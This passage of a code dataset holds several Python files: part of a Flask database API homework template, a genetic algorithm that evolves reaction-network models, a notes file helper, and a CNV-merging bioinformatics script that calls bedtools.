entry with such primary key'\n                return generate_resource_not_found(msg=msg)\n            else:\n                msg = 'The entry is found but the new values given are the same as old values'\n        else:\n            msg = 'The entry is successfully updated'\n\n        return generate_success(msg=msg)\n\n    else:\n        return generate_invalid()\n\n@application.route('/api/<dbname>/<resource_name>', methods=['GET', 'POST'])\ndef get_resource(dbname, resource_name):\n    context = log_and_extract_input(get_resource, (dbname, resource_name))\n\n    #\n    # SOME CODE GOES HERE\n    #\n    # -- TO IMPLEMENT --\n\n    # Get our rdb_data_table and at the same time cache it if it doesn't exist yet\n    try:\n        rdb_data_table = dta.get_rdb_table(resource_name, dbname)\n    except Exception as exception:\n        print(exception)\n        return generate_error(ex=exception, msg='No such database or table: ')\n\n    if request.method == 'GET':\n        #\n        # SOME CODE GOES HERE\n        #\n        # -- TO IMPLEMENT --\n\n        # Get template from query params\n        template = context['query_params']\n\n        # Get field_list from context\n        field_list = get_field_list(context)\n\n        try:\n            rsp_data = rdb_data_table.find_by_template(template, field_list)\n        except Exception as exception:\n            print(exception)\n            return generate_error(ex=exception, msg='Fetch by template fails: ')\n\n        if dta.is_empty(rsp_data):\n            msg = 'No entry with such template'\n            return generate_resource_not_found(msg=msg)\n\n        # To accommodate for datetime format, set the default datetime to string\n        rsp_str = json.dumps(rsp_data, default=str)\n\n        return generate_success(rsp_str=rsp_str)\n\n    elif request.method == 'POST':\n        #\n        # SOME CODE GOES HERE\n        #\n        # -- TO IMPLEMENT --\n        new_record = context['body']\n\n        try:\n            rsp_data = rdb_data_table.insert(new_record)\n        except Exception as exception:\n            return generate_error(ex=exception, msg='Insert fails: ')\n\n        return generate_success(msg='Entry successfully inserted')\n\n    else:\n        return 
generate_invalid()\n\n\n@application.route('/api/<dbname>/<parent_name>/<primary_key>/<target_name>', methods=['GET'])\ndef get_by_path(dbname, parent_name, primary_key, target_name):\n\n    # Do not implement\n\n    result = \" -- THANK ALY AND ARA -- \"\n\n    return result, 501, {'Content-Type': 'application/json; charset=utf-8'}\n\n\n\n\n@application.route('/api/<dbname>/<parent_name>/<primary_key>/<target_name>/<target_key>',\n                   methods=['GET'])\ndef get_by_path_key(dbname, parent_name, primary_key, target_name, target_key):\n    # Do not implement\n\n    result = \" -- THANK ALY AND ARA -- \"\n\n    return result, 501, {'Content-Type': 'application/json; charset=utf-8'}\n\n\n# You can ignore this method.\ndef handle_error(e, result):\n    return \"Internal error.\", 504, {'Content-Type': 'text/plain; charset=utf-8'}\n\n# run the app.\nif __name__ == \"__main__\":\n    # Setting debug to True enables debug output. This line should be\n    # removed before deploying a production app.\n\n\n    logger.debug(\"Starting HW2 time: \" + str(datetime.now()))\n    application.debug = True\n    application.run(host=_host, port=_port)","sub_path":"HW_Assignments/HW2F19-Template/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"640502790","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 20:52:33 2021\r\n\r\n@author: hsauro\r\n\"\"\"\r\n\r\nimport tellurium as te\r\nimport roadrunner\r\nimport teUtils as tu\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport readObjData\r\nimport evalFitness\r\nfrom commonTypes import TModel_\r\nimport copy, sys, os, math, getopt, json, time, zipfile\r\nimport evolUtils, uModel\r\nfrom uModel import TReaction\r\nfrom pprint import pprint\r\nfrom datetime import date\r\nfrom datetime import datetime\r\nimport keyboard\r\n\r\nfrom uLoadCvode import TCvode\r\nimport uLoadCvode\r\n\r\n# # Expected Output\r\n# timeStart 0.0\r\n# timeEnd 1.25\r\n# numberOfPoints 9\r\n# 5\r\n# 30.0\r\n# 5\r\n# 30.0\r\n# 5\r\n# 30.0\r\n# 5\r\n# 30.0\r\n# 5\r\n\r\nnDeleteReactions = 0\r\nnAddReaction = 0\r\nnParameterChanges = 0\r\ntimetaken = 0\r\n\r\ntu.buildNetworks.Settings.ReactionProbabilities.UniUi = 0.1\r\ntu.buildNetworks.Settings.ReactionProbabilities.UniBi = 0.4\r\ntu.buildNetworks.Settings.ReactionProbabilities.BiUni = 0.4\r\ntu.buildNetworks.Settings.ReactionProbabilities.BiBi = 0.1\r\n\r\n# [UNIUNI, [6], [1], 0.4044825260841083]\r\n\r\ndef readObjectiveFunction ():\r\n    result = readObjData.ObjectiveFunctionData()\r\n    f = open(\"objectivefunction.txt\", \"r\")\r\n\r\n    astr = f.readline() # Dump the first comment line\r\n\r\n    astr = f.readline()\r\n    aList = astr.split ()\r\n    result.timeStart = float (aList[1])\r\n\r\n    astr = f.readline();\r\n    aList = astr.split ();\r\n    result.timeEnd = float (aList[1])\r\n\r\n    astr = f.readline()\r\n    aList = astr.split ()\r\n    result.numberOfPoints = int (aList[1])\r\n\r\n    for i in range (result.numberOfPoints):\r\n        result.outputData.append (float (f.readline()))\r\n    f.close()\r\n    return result\r\n\r\n\r\n# Not currently used\r\ndef mutateReactionOld (model):\r\n    nReactions = model[TModel_.reactionList][0]\r\n    floats = model[2][0:model[TModel_.nFloats]]\r\n    n = random.randint(1, nReactions)\r\n    # create a new reaction by overwriting the nth reaction\r\n    rt = random.randint (0, 3)\r\n    rxns = model[TModel_.reactionList]\r\n    rxn = rxns[n]\r\n    rxn[0] = rt\r\n    if rt == tu.buildNetworks.TReactionType.UNIUNI:\r\n        rxn[1] = [random.choice(floats)]\r\n        rxn[2] = [random.choice(floats)]\r\n    if rt == 
tu.buildNetworks.TReactionType.BIUNI:\r\n rxn[1] = [random.choice(floats), random.choice(floats)]\r\n rxn[2] = [random.choice(floats)]\r\n if rt == tu.buildNetworks.TReactionType.UNIBI:\r\n rxn[1] = [random.choice(floats)]\r\n rxn[2] = [random.choice(floats), random.choice(floats)]\r\n if rt == tu.buildNetworks.TReactionType.BIBI:\r\n rxn[1] = [random.choice(floats), random.choice(floats)]\r\n rxn[2] = [random.choice(floats), random.choice(floats)]\r\n \r\n # rate constant\r\n rxn[3] = random.random()*10\r\n return model\r\n \r\n\r\ndef addReaction (model):\r\n global nAddReaction\r\n nAddReaction += 1\r\n floats = range(0, model.numFloats)\r\n rt = random.randint (0, 3) # Reaction type\r\n reaction = TReaction() \r\n reaction.reactionType = rt\r\n if rt == tu.buildNetworks.TReactionType.UNIUNI:\r\n r1 = [random.choice(floats)] \r\n p1 = [random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.product1 = p1[0]\r\n \r\n if rt == tu.buildNetworks.TReactionType.BIUNI:\r\n r1 = [random.choice(floats), random.choice(floats)] \r\n p1 = [random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.reactant2 = r1[1]\r\n reaction.product1 = p1[0]\r\n \r\n if rt == tu.buildNetworks.TReactionType.UNIBI:\r\n r1 = [random.choice(floats)]\r\n p1 = [random.choice(floats), random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.product1 = p1[0]\r\n reaction.product2 = p1[1]\r\n \r\n if rt == tu.buildNetworks.TReactionType.BIBI:\r\n r1 = [random.choice(floats), random.choice(floats)] \r\n p1 = [random.choice(floats), random.choice(floats)]\r\n reaction.reactant1 = r1[0]\r\n reaction.reactant2 = r1[1]\r\n reaction.product1 = p1[0]\r\n reaction.product2 = p1[1]\r\n \r\n reaction.rateConstant = random.random()*defaultConfig['rateConstantScale']\r\n model.reactions.append (reaction)\r\n return model\r\n\r\n\r\ndef deleteReaction (model):\r\n global nDeleteReactions\r\n nDeleteReactions += 1\r\n nReactions = len (model.reactions)\r\n if nReactions > 2:\r\n n = random.randint(1, nReactions-1)\r\n del model.reactions[n]\r\n \r\n \r\n# Either delete or add a new reaction, 50/50 chance\r\ndef mutateReaction (model):\r\n if random.random() > 0.5:\r\n deleteReaction(model)\r\n else:\r\n addReaction(model) \r\n \r\n \r\ndef mutateRateConstant (model):\r\n global nParameterChanges\r\n nParameterChanges += 1\r\n # pick a random reaction\r\n nReactions = len (model.reactions)\r\n nth = random.randint(0, nReactions-1) # pick a reaction\r\n rateConstant = model.reactions[nth].rateConstant \r\n x = currentConfig['percentageChangeInParameter']*rateConstant\r\n \r\n change = random.uniform(-x,x)\r\n return nth, change\r\n\r\n\r\ndef computeFitness (population):\r\n for index, model in enumerate (population):\r\n #if keyboard.is_pressed(\"q\"):\r\n # print (\"keyboard break\")\r\n # sys.exit() \r\n evalFitness.computeFitnessOfIndividual (index, model, objectiveData)\r\n \r\n \r\ndef testSimulation (model, timeEnd, numberOfPoints):\r\n t, y = evalFitness.runSimulation (model, timeEnd, numberOfPoints)\r\n plt.plot (t, y)\r\n plt.show()\r\n \r\n \r\ndef refactor (model):\r\n nFloats = model[TModel_.nFloats]\r\n nBoundary = model[TModel_.nBoundary]\r\n reactions = model[TModel_.reactionList]\r\n nReactions = model[TModel_.reactionList][0]\r\n\r\n # Create map\r\n rm = list (model[TModel_.fullSpeciesList])\r\n # This is the mapping structure, two lists [[X], [Y]], X maps to Y\r\n rm = [rm] + [(list (range (len (model[TModel_.fullSpeciesList]))))]\r\n \r\n model[TModel_.fullSpeciesList] = rm[1]\r\n 
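# boundary species occupy the tail of the remapped species list\r\n    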
model[TModel_.boundaryList] = rm[1][nFloats:]\r\n \r\n for r in model[TModel_.reactionList][1:]: # don't include the number of reactions\r\n if r[0] == tu.buildNetworks.TReactionType.UNIUNI:\r\n oldr = r[1][0]\r\n new = rm[0].index(oldr)\r\n r[1][0] = new\r\n\r\n oldr = r[2][0]\r\n new = rm[0].index(oldr)\r\n r[2][0] = new\r\n\r\n if r[0] == tu.buildNetworks.TReactionType.BIUNI:\r\n oldr = r[1][0]; r[1][0] = rm[0].index(oldr); \r\n oldr = r[1][1]; r[1][1] = rm[0].index(oldr); \r\n \r\n oldr = r[2][0]; r[2][0] = rm[0].index(oldr)\r\n \r\n if r[0] == tu.buildNetworks.TReactionType.UNIBI:\r\n oldr = r[1][0]; r[1][0] = rm[0].index(oldr); \r\n \r\n oldr = r[2][0]; r[2][0] = rm[0].index(oldr)\r\n oldr = r[2][1]; r[2][1] = rm[0].index(oldr)\r\n\r\n if r[0] == tu.buildNetworks.TReactionType.BIBI:\r\n oldr = r[1][0]; r[1][0] = rm[0].index(oldr); \r\n oldr = r[1][1]; r[1][1] = rm[0].index(oldr); \r\n \r\n oldr = r[2][0]; r[2][0] = rm[0].index(oldr)\r\n oldr = r[2][1]; r[2][1] = rm[0].index(oldr)\r\n \r\n return model\r\n \r\ndef refactorMmodel(model):\r\n find = model[TModel_.fullSpeciesList]\r\n space = model[TModel_.reactionList]\r\n for i, rxn in enumerate(space):\r\n if i == 0: continue\r\n else:\r\n for ii, species in enumerate(rxn):\r\n if (ii>0 and ii<3):\r\n for x in range(len(species)):\r\n species[x] = find.index(species[x]) #essentially you are asking what \r\n #the number should be and change it\r\n return([model[0],model[1],find,model[4], False, 0])\r\n\r\ninitialConditions = [1,5,9,3,10,3,7,1,6,3,10,11,4,6,2,7,1,9,5,7,2,4,5,10,4,1,6,7,3,2,7,8]\r\n\r\n\r\ndef makeModel (nSpecies, nReactions):\r\n model = tu.buildNetworks.getRandomNetworkDataStructure(nSpecies, nReactions) \r\n nFloats = len (model[0])\r\n nBoundary = len (model[1])\r\n model.insert (0, nFloats)\r\n model.insert (1, nBoundary)\r\n # Append boundary to float list\r\n model[2] = list (np.append (model[2], model[3]))\r\n model.insert (4, initialConditions[:nFloats+nBoundary])\r\n model.append (0.0) # Append fitness variable\r\n \r\n model = refactor (model)\r\n \r\n amodel = uModel.TModel()\r\n amodel.numFloats = nFloats\r\n amodel.numBoundary = nBoundary\r\n amodel.cvode = TCvode(uLoadCvode.CV_BDF)\r\n for r in model[TModel_.reactionList][1:]:\r\n reaction = uModel.TReaction()\r\n reaction.reactionType = r[0]\r\n \r\n reaction.reactant1 = r[1][0]\r\n if reaction.reactionType == tu.buildNetworks.TReactionType.BIUNI or reaction.reactionType == tu.buildNetworks.TReactionType.BIBI:\r\n reaction.reactant2 = r[1][1]\r\n \r\n reaction.product1 = r[2][0]\r\n if reaction.reactionType == tu.buildNetworks.TReactionType.UNIBI or reaction.reactionType == tu.buildNetworks.TReactionType.BIBI:\r\n reaction.product2 = r[2][1]\r\n \r\n reaction.rateConstant = r[3]\r\n amodel.reactions.append (reaction)\r\n amodel.initialConditions = np.zeros (model[TModel_.nFloats] + model[TModel_.nBoundary])\r\n for index, ic in enumerate (model[TModel_.initialCond]):\r\n amodel.initialConditions[index] = ic\r\n amodel.fitness = 0\r\n \r\n return amodel\r\n \r\ndef clonePopulation (population):\r\n p = []\r\n for pop in population:\r\n p.append (uModel.clone (pop))\r\n return p\r\n \r\ndef savePopulation (gen, population):\r\n p = clonePopulation (population)\r\n savedPopulations.append (p)\r\n \r\ndef saveRun (seed, saveFileName):\r\n global timetaken\r\n zf = zipfile.ZipFile (saveFileName, mode=\"w\", compression=zipfile.ZIP_DEFLATED)\r\n try:\r\n json_string = json.dumps(fitnessArray)\r\n zf.writestr(\"fitnessList.txt\", json_string)\r\n \r\n astr = 
evolUtils.convertToAntimony2 (newPopulation[0]);\r\n        zf.writestr(\"best_antimony.ant\", astr)\r\n        zf.writestr (\"seed_\" + str(seed) + \".txt\", str (seed))\r\n\r\n        zf.writestr (\"config.txt\", json.dumps (currentConfig) + '\\n')\r\n\r\n        today = date.today()\r\n        now = datetime.now()\r\n        summaryStr = 'Date:' + today.strftime(\"%b-%d-%Y\") + '\\n'\r\n        summaryStr += 'Time:' + now.strftime(\"%H:%M:%S\") + '\\n'\r\n        summaryStr += 'Time taken in seconds:' + str (math.trunc (timetaken*100)/100) + \"\\n\"\r\n        summaryStr += 'Time taken (hrs:min:sec):' + str (time.strftime(\"%H:%M:%S\", time.gmtime(timetaken))) + \"\\n\"\r\n        summaryStr += '#Seed=' + str (seed) + '\\n'\r\n        summaryStr += '#Final_number_of_generations=' + str (len (savedPopulations)) + '\\n'\r\n        summaryStr += '#Size_of_population=' + str (sizeOfPopulation) + '\\n'\r\n        summaryStr += '#Number_of_added_reactions=' + str(nAddReaction) + '\\n'\r\n        summaryStr += '#Number_of_deleted_reactions=' + str (nDeleteReactions) + '\\n'\r\n        summaryStr += '#Number_of_parameter_changes=' + str (nParameterChanges) + '\\n'\r\n        summaryStr += '#Final_fitness=' + str(newPopulation[0].fitness) + '\\n'\r\n        zf.writestr('summary.txt', summaryStr)\r\n\r\n        for index, pop in enumerate (savedPopulations):\r\n            for j in range (len (pop)):\r\n                fileName = \"populations/generation_\" + str(index) + '/individual_' + str (j) + '.txt'\r\n                popSummary = '# Fitness = ' + str (pop[j].fitness) + '\\n'\r\n                popSummary += evolUtils.convertToAntimony2 (pop[j]);\r\n                zf.writestr (fileName, popSummary)\r\n    finally:\r\n        zf.close()\r\n        pass\r\n\r\ndef plotFitnessPopulationHist (population):\r\n    data = []\r\n    for model in population:\r\n        data.append (model.fitness)\r\n    plt.hist (data)\r\n    plt.show()\r\n\r\ndef plotFitnessOfIndividuals(population):\r\n    data = []\r\n    for model in population:\r\n        data.append (model.fitness)\r\n    plt.plot (data)\r\n    plt.show()\r\n\r\ndef plotPopulationPlots (population):\r\n    n = math.trunc (math.sqrt (len (population)))\r\n    fig, axs = plt.subplots(n,n,figsize=(13,11))\r\n    count = 0\r\n    for i in range (n):\r\n        for j in range (n):\r\n            t, y = evalFitness.runSimulation (population[count], 1.25, 100)\r\n            axs[i, j].plot(t, y)\r\n            count += 1\r\n\r\ndef plotFitnessArray():\r\n    plt.plot (fitnessArray)\r\n    plt.show()\r\n\r\ndef plotFitnessFromFile (fileName):\r\n    data = np.loadtxt(fileName, delimiter=',')\r\n    plt.plot(data[:,0], data[:,1])\r\n    plt.show()\r\n\r\ndef displayFitness (population):\r\n    for p in population:\r\n        print (p.fitness)\r\n\r\ndef test(tag):\r\n    if gen == 7:\r\n        evalFitness.computeFitnessOfIndividual (newPopulation[0], objectiveData)\r\n        print (\"fitness at 7 (tag) = \", tag, newPopulation[0].fitness)\r\n\r\ndef printModel (model):\r\n    print (\"Model details:\")\r\n    print ('Num floats:', model.numFloats, 'num boundary:', model.numBoundary, 'Num reactions:', len (model.reactions), 'fitness:', math.trunc (model.fitness*100)/100);\r\n    for r in model.reactions:\r\n        print (r.reactionType, r.reactants, r.products, r.rateConstant)\r\n\r\ndef writeOutConfigForModel (f, config):\r\n    f.write (\"# \" + json.dumps (config))\r\n    f.write ('\\n')\r\n\r\ndef pause():\r\n    programPause = input(\"Press the <ENTER> key to continue...\")\r\n\r\n# ---------------------------------------------------------------------\r\n\r\ndefaultConfig = {\"maxGenerations\": 450,\r\n                 \"sizeOfPopulation\": 100,\r\n                 \"numSpecies\": 10,\r\n                 \"numReactions\": 14,\r\n                 \"rateConstantScale\": 50,\r\n                 \"probabilityMutateRateConstant\": 0.7, # 0.9 much worse\r\n                 \"percentageCloned\": 
0.1,\r\n                 \"percentageChangeInParameter\": 0.15,\r\n                 \"seed\": -1, # means no specific seed\r\n                 \"threshold\": 10.5, # a fitness below this we stop\r\n                 \"frequencyOfOutput\": 10,\r\n                 \"multi\": {\"item 1\": \"item 2\"},\r\n                 \"key2\": \"value2\"}\r\n\r\nseed = -1; maxGenerations = -1\r\nnewConfigFile = ''\r\nargv = sys.argv[1:]\r\noptions, args = getopt.getopt(argv, 's:g:c:hv', [])\r\nfor opt, arg in options:\r\n    if opt in ('-s', ''):\r\n        seed = int (arg)\r\n    if opt in ('-g', ''):\r\n        maxGenerations = int(arg)\r\n    if opt in ('-c', ''):\r\n        newConfigFile = arg\r\n        if not newConfigFile.endswith('.json'):\r\n            newConfigFile += '.json'\r\n        print (newConfigFile + ' in use')\r\n    if opt in ('-v', ''):\r\n        print (\"version 1.0\")\r\n        sys.exit()\r\n    if opt in ('-h', ''):\r\n        print (\"Help:\")\r\n        print (\"Set the seed: -s 54545353\")\r\n        print (\"Set the number of generations to use: -g 1000\")\r\n        sys.exit()\r\n\r\nprint (\"------------------------------\")\r\nprint (\"Press ctrl+q to interrupt a run\")\r\nprint (\"------------------------------\\n\")\r\nif not os.path.exists('defaultConfig.json'):\r\n    print (\"Writing defaultConfig.json\")\r\n    with open('defaultConfig.json', 'w') as f:\r\n        json.dump(defaultConfig, f)\r\n\r\nif newConfigFile == '':\r\n    print (\"Default configuration in use\")\r\n    currentConfig = defaultConfig\r\nelse:\r\n    # load the user-supplied JSON configuration\r\n    with open(newConfigFile) as f:\r\n        currentConfig = json.load(f)\r\n\r\n# revert to default if not set\r\nif maxGenerations == -1:\r\n    maxGenerations = currentConfig['maxGenerations']\r\n\r\nprint (\"Maximum Generations = \", maxGenerations)\r\n\r\nobjectiveData = readObjectiveFunction()\r\n# seed can be set at the cmd line using -s 1234\r\n# otherwise check config file, if that is not set\r\n# draw a random seed\r\nif seed == -1:\r\n    if currentConfig['seed'] == -1:\r\n        seed = random.randrange(sys.maxsize)\r\n    else:\r\n        seed = currentConfig['seed']\r\nprint ('seed = ', seed)\r\n#seed = 456789\r\nrandom.seed(seed)\r\n\r\ntu.buildNetworks.Settings.allowMassViolatingReactions = True\r\ntu.buildNetworks.Settings.rateConstantScale = currentConfig['rateConstantScale']\r\n\r\n# Create initial random population\r\nsizeOfPopulation = currentConfig['sizeOfPopulation']\r\npopulation = []\r\nfor i in range (sizeOfPopulation):\r\n    amodel = makeModel (currentConfig['numSpecies'], currentConfig['numReactions'])\r\n    population.append (amodel)\r\n\r\nmodel = population[0]\r\ntopElite = math.trunc (currentConfig['percentageCloned']*sizeOfPopulation)\r\n\r\n# Main loop\r\nfitnessArray = []\r\nsavedPopulations = []\r\nstartTime = time.time()\r\nfor gen in range (0, maxGenerations):\r\n\r\n    computeFitness (population)\r\n\r\n    # Sort the population according to fitness\r\n    population.sort (key=lambda x: x.fitness)\r\n\r\n    # Create the next population\r\n    newPopulation = []\r\n    if gen % currentConfig['frequencyOfOutput'] == 0:\r\n        print(flush=True)\r\n        print (\"gen[\" + str (gen)+ \"] fitness=\",\r\n               \"{:.4f}\".format(population[0].fitness),\r\n               str(len (population[0].reactions)), end='',flush=True)\r\n    else:\r\n        print ('.', end='',flush=True)\r\n    # Record the best fitness\r\n    fitnessArray.append (population[0].fitness)\r\n\r\n    # Clone in the best individual from the current population\r\n    newPopulation.append (uModel.clone (population[0]))\r\n    # Copy over the top elite of the population\r\n    for i in range (topElite-1):\r\n        newPopulation.append (uModel.clone (population[i]))\r\n\r\n    # For the remainder use tournament selection on pairs of\r\n    # individuals, picking the best and mutating it. 
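Mutation either rewires\r\n    # a reaction (add or delete one) or perturbs a single rate constant.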
\r\n remainder = sizeOfPopulation - topElite\r\n \r\n for i in range (remainder):\r\n\r\n # pick two models at random, then pick the best and mutate it\r\n r1 = random.randint(1, sizeOfPopulation-1)\r\n r2 = random.randint(1, sizeOfPopulation-1) \r\n \r\n if population[r1].fitness < population[r2].fitness:\r\n if random.random() > currentConfig['probabilityMutateRateConstant']:\r\n mutateReaction(population[r1]) \r\n else:\r\n n, change = mutateRateConstant (population[r1]) \r\n amodel = uModel.clone (population[r1])\r\n amodel.reactions[n].rateConstant += change\r\n newPopulation.append (amodel)\r\n else:\r\n if random.random() > currentConfig['probabilityMutateRateConstant']:\r\n mutateReaction(population[r2]) \r\n else:\r\n n, change = mutateRateConstant (population[r2]) \r\n amodel = uModel.clone (population[r2])\r\n amodel.reactions[n].rateConstant += change;\r\n newPopulation.append (amodel)\r\n \r\n if keyboard.is_pressed(\"ctrl+q\"):\r\n print (\"keyboard break\")\r\n sys.exit() \r\n \r\n population = newPopulation\r\n savePopulation (gen, population)\r\n \r\n if population[0].fitness < currentConfig['threshold']:\r\n break\r\n\r\nprint('\\n')\r\nif newPopulation[0].fitness < 100:\r\n print (\"Success.......\")\r\n saveFileName = \"Model_\" + str (seed) + \".zip\"\r\n print(\"Saving entire state to --- \", saveFileName)\r\n saveRun (seed, saveFileName)\r\nelse:\r\n print (\"Trial failed.....\") \r\n saveFileName = \"FAIL_Model_\" + str (seed) + \".zip\"\r\n print(\"Saving entire state to --- \", saveFileName)\r\n saveRun (seed, saveFileName)\r\n \r\n \r\ntimetaken = time.time() - startTime\r\n \r\nprint(\"Final fitness = \", population[0].fitness)\r\nprint (\"Time taken in seconds = \", math.trunc (timetaken*100)/100)\r\nprint (\"Time taken (hrs:min:sec): \", time.strftime(\"%H:%M:%S\", time.gmtime(timetaken)))\r\nprint (\"Seed = \", seed)\r\nprint ('Number of added reactions = ', nAddReaction)\r\nprint ('Number of deleted reactions = ', nDeleteReactions)\r\nprint ('Number of parameter changes = ', nParameterChanges)\r\n# if newPopulation[0].fitness < 100:\r\n# astr = evolUtils.convertToAntimony2 (newPopulation[0]);\r\n# print (astr)\r\n# f = open(\"model_\" + str(seed) + \".txt\", \"w\")\r\n# writeOutConfigForModel (f, currentConfig)\r\n# f.write (\"Time taken in seconds = \" + str (math.trunc (timetaken*100)/100))\r\n# f.write (\"Time taken (hrs:min:sec): \" + str (time.strftime(\"%H:%M:%S\", time.gmtime(timetaken))))\r\n# f.write ('# Seed = ' + str (seed) + '\\n')\r\n# f.write ('# Number of added reactions = ' + str(nAddReaction) + '\\n')\r\n# f.write ('# Number of deleted reactions = ' + str (nDeleteReactions) + '\\n')\r\n# f.write ('# Number of parameter changes = ' + str (nParameterChanges) + '\\n')\r\n# f.write ('# Final fitness = ' + str(newPopulation[0].fitness) + '\\n')\r\n# f.write(astr)\r\n# f.close() \r\n \r\n# # f = open(\"fitness_\" + str(seed) + \".txt\", \"w\") \r\n# # for index, fitness in enumerate (fitnessArray):\r\n# # f.write (str (index) + ', ' + str(fitness) + '\\n')\r\n# # f.close() \r\n# else:\r\n# f = open(\"fail\" + str(seed) + \".txt\", \"w\")\r\n# f.write(str(newPopulation[0].fitness))\r\n# f.close() \r\n\r\n \r\n \r\n\r\n \r\n\r\n","sub_path":"evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":20635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} 
+{"seq_id":"582868957","text":"\r\n\r\n#%%-----------------------------------------------IMPORTS---------------------------------------------\r\nimport datetime\r\nimport os\r\n\r\nclass Note():\r\n '''\r\n This class is designed for organizing class notes\r\n '''\r\n directory = r\"C:\\Users\\Patrick\\AppData\\Local\\Continuum\\Anaconda3\\Lib\\site-packages\\mined_minds\\day\\cls\\class_notes\"\r\n \r\n note_header = '''\r\n######################################################################\r\n# #\r\n# Mined Minds Class Notes #\r\n# #\r\n######################################################################\\n\\n'''\r\n\r\n def __init__(self): #\r\n #self.directory = Note.directory # \r\n self.date = datetime.datetime.today() #\r\n self.filename = self.date.strftime('%A_%B_%Y'+'.txt') #\r\n self.abspath = os.path.join(self.directory, self.filename) #\r\n self.file = open(self.abspath, \"a+\") #\r\n self.write(Note.note_header) #\r\n self.isopen = self.file.closed #\r\n \r\n def openn(self): #\r\n self.file = open(self.abspath, \"a+\") # \r\n \r\n def write(self, line): #\r\n self.file.write(line) #\r\n \r\n def close(self): #\r\n self.file.close() #\r\n \r\n def read(self): #\r\n if self.isopen: #\r\n self.openn() #\r\n print(self.file.read()) #\r\n else:\r\n print(self.file.read()) #\r\n \r\n def delete(self): #make it work!\r\n self.file.close()\r\n self.file.remove()\r\n","sub_path":"tools/day/cls/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"398203274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 9 14:59:01 2017\n\n@author: Caiyd\n\"\"\"\n\nfrom collections import defaultdict\nimport os\nimport numpy as np\nimport pandas as pd\nimport click\n\n\ndef bedtools(cnv_target_file, lastout, outfile):\n tmp_interfile = 'bed_%s' % outfile\n inter_file = 'inter_%s' % tmp_interfile\n fileA = 'fileA_%s' % outfile\n fileB = 'fileB_%s' % outfile\n sortedA = '%s.sorted' % fileA\n sortedB = '%s.sorted' % fileB\n command1 = r\"\"\"sed '1d' %s| awk '{print $1\"\\t\"$2\"\\t\"$3\"\\t\"$1\":\"$2\"-\"$3}' > %s\"\"\" % (cnv_target_file, fileA)\n command2 = r\"\"\"awk '{print $3\"\\t\"$4\"\\t\"$5\"\\t\"$1\"\\t\"$2}' %s > %s\"\"\" % (lastout, fileB)\n command3 = r\"\"\"bedtools intersect -a %s -b %s -wb > %s\"\"\" % (sortedA, sortedB, tmp_interfile)\n command4 = r\"\"\" sort -k1,1 -k2,2n %s > %s \"\"\" % (fileA, sortedA)\n command5 = r\"\"\" sort -k1,1 -k2,2n %s > %s \"\"\" % (fileB, sortedB)\n command6 = r\"\"\" sort -k1,1 -k2,2n %s > %s \"\"\" % (tmp_interfile, inter_file)\n os.system(command1)\n os.system(command2)\n os.system(command4)\n os.system(command5)\n os.system(command3)\n os.system(command6)\n os.remove(fileA)\n os.remove(fileB)\n os.remove(sortedA)\n os.remove(sortedB)\n os.remove(tmp_interfile)\n return inter_file\n\n\n\n\ndef loadcnv(cnv_file):\n cnv_dict = {}\n with open(cnv_file) as f:\n for n_line, line in enumerate(f):\n line = line.strip().split('\\t')\n if n_line != 0:\n id_ = '%s:%s-%s' % tuple(line[:3])\n cnv_ay = np.array(line[8: boundary_index], dtype='float64')\n cnv_dict[id_] = cnv_ay\n else:\n boundary_index = line.index('average') # avg sd\n sample_ay = np.array(line[8: boundary_index], dtype='unicode_')\n return cnv_dict, sample_ay\n\n\n\ndef load_inter_file(inter_file, outfile, asm_cnv_dict, oar_cnv_dict, asm_sample_ay, oar_sample_ay):\n asm_id_list = []\n oar_id_list = []\n asm_cnv_list = []\n oar_cnv_list = []\n with 
open(outfile, 'w') as f_write:\n with open(inter_file) as f_read:\n for n_line, line in enumerate(f_read):\n if n_line != 0:\n line = line.strip().split()\n asm_id = line[3]\n oar_id = line[7]\n if asm_id_list:\n if asm_id_list[-1] != asm_id and oar_id_list != oar_id:\n asm_chr_list = np.unique([x.split(':')[0] for x in asm_id_list])\n assert len(asm_chr_list) == 1\n asm_chr = asm_chr_list[0]\n asm_pos_list = [x.split(':')[1].split('-') for x in asm_id_list]\n asm_start = asm_pos_list[0][0]\n asm_end = asm_pos_list[-1][1]\n asm_cnv = [str(x) for x in np.mean(asm_cnv_list, axis=0)]\n oar_cnv = [str(x) for x in np.mean(oar_cnv_list, axis=0)]\n f_write.write('%s\\t%s\\t%s\\t' % (asm_chr, asm_start, asm_end))\n f_write.write('\\t'.join(asm_cnv) + '\\t')\n f_write.write('\\t'.join(oar_cnv) + '\\n')\n asm_id_list = [asm_id]\n oar_id_list = [oar_id]\n asm_cnv_list = [asm_cnv_dict[asm_id]]\n oar_cnv_list = [oar_cnv_dict[oar_id]]\n else:\n asm_id_list.append(asm_id)\n oar_id_list.append(oar_id)\n asm_cnv_list.append(asm_cnv_dict[asm_id])\n oar_cnv_list.append(oar_cnv_dict[oar_id])\n else:\n f_write.write('chr\\tstart\\tend\\t')\n f_write.write('\\t'.join(asm_sample_ay)+'\\t')\n f_write.write('\\t'.join(oar_sample_ay)+'\\n')\n\n\n@click.command()\n@click.argument('lastout')\n@click.argument('cnv_query_file')\n@click.argument('cnv_target_file')\n@click.argument('outfile')\ndef main(lastout, cnv_query_file, cnv_target_file, outfile):\n asm_cnv_dict, asm_sample_ay = loadcnv(cnv_target_file)\n oar_cnv_dict, oar_sample_ay = loadcnv(cnv_query_file)\n interfile = bedtools(cnv_target_file, lastout, outfile)\n load_inter_file(interfile, outfile, asm_cnv_dict, oar_cnv_dict, asm_sample_ay, oar_sample_ay)\n\n\nif __name__ == '__main__':\n 